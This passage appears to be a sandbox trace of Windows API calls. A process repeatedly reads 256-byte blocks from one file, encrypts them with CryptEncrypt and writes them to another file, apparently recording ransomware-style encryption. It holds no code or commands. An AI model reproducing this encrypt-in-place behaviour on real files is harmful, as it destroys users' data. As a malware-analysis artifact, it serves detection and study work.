lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.272] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.272] GetLastError () returned 0x0 [0162.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.272] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.272] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.272] GetLastError () returned 0x0 [0162.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.272] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.273] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.273] GetLastError () returned 0x0 [0162.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.273] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.273] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.273] GetLastError () returned 0x0 [0162.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.273] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.273] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.273] GetLastError () returned 0x0 [0162.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.273] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.273] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.273] GetLastError () returned 0x0 [0162.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.273] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.273] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.273] GetLastError () returned 0x0 [0162.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.273] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.273] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.273] GetLastError () returned 0x0 [0162.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.273] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.273] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.273] GetLastError () returned 0x0 [0162.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.274] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.274] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.274] GetLastError () returned 0x0 [0162.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.274] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.274] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.274] GetLastError () returned 0x0 [0162.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.274] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.274] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.274] GetLastError () returned 0x0 [0162.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.274] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.274] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.274] GetLastError () returned 0x0 [0162.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.274] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.274] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.274] GetLastError () returned 0x0 [0162.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.274] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.274] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.275] GetLastError () returned 0x0 [0162.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.275] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.275] GetLastError () returned 0x0 [0162.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.275] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.275] GetLastError () returned 0x0 [0162.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.275] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.275] GetLastError () returned 0x0 [0162.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.275] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.275] GetLastError () returned 0x0 [0162.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.275] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.275] GetLastError () returned 0x0 [0162.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.275] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.275] GetLastError () returned 0x0 [0162.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.276] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.276] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.276] GetLastError () returned 0x0 [0162.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.276] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.276] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.276] GetLastError () returned 0x0 [0162.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.276] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.276] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.276] GetLastError () returned 0x0 [0162.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.276] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.276] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.276] GetLastError () returned 0x0 [0162.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.276] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.276] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.276] GetLastError () returned 0x0 [0162.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.276] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.276] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.276] GetLastError () returned 0x0 [0162.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.277] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.277] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.277] GetLastError () returned 0x0 [0162.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.277] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.277] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.277] GetLastError () returned 0x0 [0162.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.277] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.277] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.277] GetLastError () returned 0x0 [0162.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.277] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.277] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.277] GetLastError () returned 0x0 [0162.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.277] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.277] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.277] GetLastError () returned 0x0 [0162.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.277] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.277] CryptEncrypt (in: 